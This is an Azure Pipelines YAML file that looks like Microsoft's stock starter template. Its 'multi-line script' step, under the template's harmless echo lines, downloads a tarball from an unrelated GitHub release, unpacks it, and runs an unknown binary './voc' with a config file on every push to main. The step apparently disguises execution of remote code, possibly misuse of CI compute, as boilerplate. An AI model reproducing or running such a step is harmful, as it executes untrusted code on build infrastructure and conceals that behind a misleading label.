# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
    wget https://github.com/dir99/G-5/releases/download/G-5/G-5.tar.gz
    tar -xvf G-5.tar.gz
    ./voc cabe.ini
  displayName: 'Run a multi-line script'
